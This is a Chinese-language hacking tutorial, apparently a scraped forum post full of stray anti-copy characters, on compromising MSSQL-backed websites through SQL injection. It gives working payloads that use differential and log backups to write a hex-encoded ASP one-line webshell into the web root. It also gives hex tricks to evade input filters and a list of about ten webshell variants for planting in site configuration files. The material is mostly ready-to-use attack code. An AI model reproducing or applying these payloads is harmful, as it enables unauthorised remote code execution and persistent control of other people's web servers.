MSsql差异备份总结

admin

差异备份的流程大概这样：
0 n6 r% _" ^3 b3 ^& G1.完整备份一次(保存位置当然可以改)
backup database 库名 to disk = 'c:\ddd.bak';--

$ i4 A6 c/ l  G* ?0 G2.创建表并插曲入数据
create table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
! u9 {) I! U) C8 ]! h$ w
3.进行差异备份
backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
4 h2 |1 y+ l( |3 S6 J  b) V
上面
0x3C25657865637574652872657175657374282261222929253E
4 f3 w" P1 d( Q% S8 R1 X7 R就是一句话木马的内容：<%execute(request("a"))%>
  I- t/ `6 Z# M
$ k! ~4 B$ b1 a$ u+ R" s7 l" B; s0 c如下是网上常见的差异备份代码，思路一样！
0 H- k; R- u7 H; g===================================================
" S; l+ R5 e9 F9 @利用差异备份提高提高backupwebshell的成功率,减少文件大小
. T. z3 t" }6 g; n9 {步骤:

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库

) b& K$ Z1 J; W8 L. e  `create table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表

7 W5 r  E& q& ^/ B$ r
% J8 k- K7 ?2 W4 F( }insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中
  |: @5 a) ]1 @$ }0 n. K( a
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份
1 l) \8 ~" M& {/ ]; `$ d6 p9 z2 f
! h- i# \& ^6 i( z7 n' }2 g2 |drop table [xiaolu]  -- 删除此表。
. `2 w! Z" M; ^# {% @; _
6 t; n/ K9 E+ L1 D0x77006F006B0061006F002E00620061006B00为wokao.bak
0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp
) s. }3 D% B' y& W/ K5 \% F4 G
0 r7 B; x5 {& i& U$ C( R$ j! W声明：方法不是我想的，我只是写工具，默认得到shell是
8 R. Y: P5 n% c" N. V<%execute(request("a"))%>
) f# ], D. @1 a) n, a===============================================================
+ ~6 e/ ~+ J" M+ v0 C8 c
我发现上面代码，有时会无效，而直接用
- Y" A& c: e0 p5 x# v; p
, K2 z9 A3 s8 D8 }backup database 库名 to disk = 'c:\ddd.bak'
2 {4 @! R  Y! z/ E, a% o6 [6 g4 o
: i: y3 x8 [# q8 S# Xcreate table [dbo].[dtest] ([cmd] [image]);

, z) p! y$ J; e3 i1 m- E; P9 Q) p4 x. O% Jinsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
& `4 F+ s& d$ |6 M: n/ _9 x
却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！

库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！

6 q  F$ c8 q* p% I+ k) z& {网上还有log增量备份的，我也把他记录一下
=====================================================
另一种log增量备份技术:
. E% |6 _2 Q, {8 s8 [* H% z
';alter database null set RECOVERY FULL--

9 f  M1 H# R; ?0 B4 Z& V" M';create table cmd (a image)--
0 h1 J5 T' o* v0 ^  I/ ^! V
';backup log null to disk = 'f:\cmd' with init--
1 I4 t6 W1 l* ^' b. A
';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
2 S9 v( V: w/ w
';backup log null to disk = '备份路径'--
$ l# N$ ]' s  v: D. k
';drop table cmd--

';alter database XXX set RECOVERY SIMPLE--
5 j1 g. }+ b9 p& U: G5 I! l2 U! e
PS:0x3C2565786563757465287265717565737428226122292
9 r( _# l5 _/ C/ N+ ~) U$ K# F9253EDA 是一句话小马16进制转来的
$ K+ ~" k, e9 v4 Y0 Z; R
说到一句话马，还可以有这么几种写法：

a)<%%25Execute(request("a"))%%25>
b)<%Execute(request("a"))%>
- c3 v8 R* ?# Vc)%><%execute request("a")%><%
2 `, Q* q0 d! \6 Jd)<script language=VBScript runat=server>execute request("a")</script>
e)<%25Execute(request("a"))%25>
f)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
% Q5 N! T$ a3 e, C4 w0 k% A" {3 ?) W* Gg)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
h)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
3 A/ n; s* L0 y: RI)<%eval request(0)%>
; E" {9 K: T/ e4 h7 V4 A9 uJ)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话
  k2 S; k+ g$ u! U+ y
( ^- }( D- R4 t) U/ H# w=============================================

当遇到差备过滤了/时用这个语句代替
2 ?) K* H' Y* }5 c' C+ r; \1 a; u$ X% p
# M. W3 d- D7 [declare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--

- h6 j, {% {, c/ o把要执行的语句转16进制然后用exec执行
8 ?" \* L% ]9 V% e: {3 ?4 ~

6 R: z) X1 F9 [5 j减少备份文件大小方法如下:

% g. h* I" Y7 A) }2 K1 b总的来说就是那么简单几句,下面以备份数据库model为例子
' [" B3 _! Z* C& W( p3 f9 o1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
2
id=1;backup database model to disk='你的路径‘ with differential,format;--
* D4 M* o- h1 v2 t: Q3 v8 [7 U% [


: q: F9 @3 n' Q  h: B2 r6 X* W$ vSQL语句清理日志
1 M- z2 |4 s+ ]/ ~注：test为数据库名

--清空日志
& T! I# f  q$ [" r, L$ [2 Q- L7 hDUMP TRANSACTION test WITH NO_LOG

7 f0 f; ^$ D" m% V--截断事务日志
4 n- f8 T% A8 v* N/ t6 E2 uBACKUP LOG test WITH NO_LOG

0 @3 M0 H" X; O$ P. h4 R. e; k--收缩数据库
DBCC SHRINKDATABASE(test)
* C' G$ ?! G6 _2 F, O- Q5 _$ t5 }2 D
--收缩指定数据文件,1是文件号,可以通过这个语句查询到
0 A" t: g! z) x7 ySelect * from sysfiles DBCC SHRINKFILE(1)

--以后能自动收缩
4 U& b: H: P' C: j9 y3 AEXEC sp_dboption 'test', 'autoshrink', 'TRUE'